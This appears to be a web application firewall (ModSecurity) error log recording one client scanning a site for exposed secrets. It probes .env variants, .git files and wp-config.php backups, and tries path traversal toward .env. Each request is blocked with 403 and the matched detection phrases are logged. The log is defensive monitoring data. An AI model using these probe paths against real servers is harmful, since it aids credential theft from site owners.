[Tue May 12 06:16:05.637410 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.166:36074] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.save"] [unique_id "agKphdr1yOh9TvizezitcwAAAEk"]
[Tue May 12 06:16:05.651864 2026] [security2:error] [pid 1825287:tid 1825324] [client 45.148.10.166:35972] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production.local"] [unique_id "agKphQgpmE1yW0glLdg8LgAAANM"]
[Tue May 12 06:16:05.652067 2026] [security2:error] [pid 1825287:tid 1825324] [client 45.148.10.166:35972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production.local"] [unique_id "agKphQgpmE1yW0glLdg8LgAAANM"]
[Tue May 12 06:16:05.668016 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.166:35970] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKphdr1yOh9TvizezitdQAAAFI"]
[Tue May 12 06:16:05.668228 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.166:35970] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/.env"] [unique_id "agKphdr1yOh9TvizezitdQAAAFI"]
[Tue May 12 06:16:05.715121 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:35892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpg81tk6y7yBJLpJpE1QAAAIs"]
[Tue May 12 06:16:05.735078 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpg_aAnTZtx1_H_wzF5wAAAVI"]
[Tue May 12 06:16:05.736264 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:35892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.txt"] [unique_id "agKphc1tk6y7yBJLpJpE2QAAAIs"]
[Tue May 12 06:16:05.736446 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:35892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.txt"] [unique_id "agKphc1tk6y7yBJLpJpE2QAAAIs"]
[Tue May 12 06:16:05.759846 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/HEAD"] [unique_id "agKphfaAnTZtx1_H_wzF6wAAAVI"]
[Tue May 12 06:16:05.760082 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.166:35846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/HEAD"] [unique_id "agKphfaAnTZtx1_H_wzF6wAAAVI"]
[Tue May 12 06:16:05.764270 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpg9r1yOh9TvizezitcAAAAFY"]
[Tue May 12 06:16:05.770410 2026] [security2:error] [pid 1842385:tid 1842410] [client 45.148.10.166:36076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.old"] [unique_id "agKphRs7kySIUZ3ORnI1GAAAARM"]
[Tue May 12 06:16:05.770611 2026] [security2:error] [pid 1842385:tid 1842410] [client 45.148.10.166:36076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.old"] [unique_id "agKphRs7kySIUZ3ORnI1GAAAARM"]
[Tue May 12 06:16:05.794451 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agKphdr1yOh9TvizeziteAAAAFY"]
[Tue May 12 06:16:05.794642 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agKphdr1yOh9TvizeziteAAAAFY"]
[Tue May 12 06:16:06.070249 2026] [security2:error] [pid 1825179:tid 1825219] [client 45.148.10.166:35884] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/main"] [unique_id "agKphtr1yOh9TvizezitegAAAFU"]
[Tue May 12 06:16:06.070450 2026] [security2:error] [pid 1825179:tid 1825219] [client 45.148.10.166:35884] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/main"] [unique_id "agKphtr1yOh9TvizezitegAAAFU"]
[Tue May 12 06:16:06.129084 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.166:35976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpg_aAnTZtx1_H_wzF5gAAAUk"]
[Tue May 12 06:16:06.164595 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:35954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpgxfeipD4uoG21Fo_ngAAAA8"]
[Tue May 12 06:16:06.167836 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.166:35976] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/logs/HEAD"] [unique_id "agKphvaAnTZtx1_H_wzF7QAAAUk"]
[Tue May 12 06:16:06.168042 2026] [security2:error] [pid 1844863:tid 1844878] [client 45.148.10.166:35976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/logs/HEAD"] [unique_id "agKphvaAnTZtx1_H_wzF7QAAAUk"]
[Tue May 12 06:16:06.187360 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.166:35928] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/master"] [unique_id "agKphggpmE1yW0glLdg8MAAAAMQ"]
[Tue May 12 06:16:06.187552 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.166:35928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/refs/heads/master"] [unique_id "agKphggpmE1yW0glLdg8MAAAAMQ"]
[Tue May 12 06:16:06.193822 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:35954] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/index"] [unique_id "agKphhfeipD4uoG21Fo_pAAAAA8"]
[Tue May 12 06:16:06.194026 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.166:35954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/index"] [unique_id "agKphhfeipD4uoG21Fo_pAAAAA8"]
[Tue May 12 06:16:06.212327 2026] [core:error] [pid 1825179:tid 1825204] [client 45.148.10.166:36054] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 06:16:06.772361 2026] [core:error] [pid 1842385:tid 1842414] [client 45.148.10.166:36090] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 06:16:06.779917 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:36104] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.gitignore"] [unique_id "agKphs1tk6y7yBJLpJpE2wAAAJY"]
[Tue May 12 06:16:06.780156 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.166:36104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.gitignore"] [unique_id "agKphs1tk6y7yBJLpJpE2wAAAJY"]
[Tue May 12 06:16:06.781676 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:36120] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKphggpmE1yW0glLdg8MQAAAMI"]
[Tue May 12 06:16:06.781803 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.166:36120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agKphggpmE1yW0glLdg8MQAAAMI"]
[Tue May 12 06:16:06.801728 2026] [security2:error] [pid 1842385:tid 1842399] [client 45.148.10.166:36038] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpgxs7kySIUZ3ORnI1FAAAAQk"]
[Tue May 12 06:16:07.601718 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:35912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphM1tk6y7yBJLpJpE1wAAAI0"]
[Tue May 12 06:16:07.612122 2026] [security2:error] [pid 1842385:tid 1842403] [client 45.148.10.166:64938] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php.bak"] [unique_id "agKphxs7kySIUZ3ORnI1GgAAAQ0"]
[Tue May 12 06:16:07.612317 2026] [security2:error] [pid 1842385:tid 1842403] [client 45.148.10.166:64938] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php.bak"] [unique_id "agKphxs7kySIUZ3ORnI1GgAAAQ0"]
[Tue May 12 06:16:07.646564 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:64964] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKphwgpmE1yW0glLdg8MwAAAMw"]
[Tue May 12 06:16:07.646728 2026] [security2:error] [pid 1825287:tid 1825317] [client 45.148.10.166:64964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKphwgpmE1yW0glLdg8MwAAAMw"]
[Tue May 12 06:16:07.648181 2026] [security2:error] [pid 1844863:tid 1844873] [client 45.148.10.166:64842] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env~"] [unique_id "agKph_aAnTZtx1_H_wzF9AAAAUQ"]
[Tue May 12 06:16:07.648365 2026] [security2:error] [pid 1844863:tid 1844873] [client 45.148.10.166:64842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env~"] [unique_id "agKph_aAnTZtx1_H_wzF9AAAAUQ"]
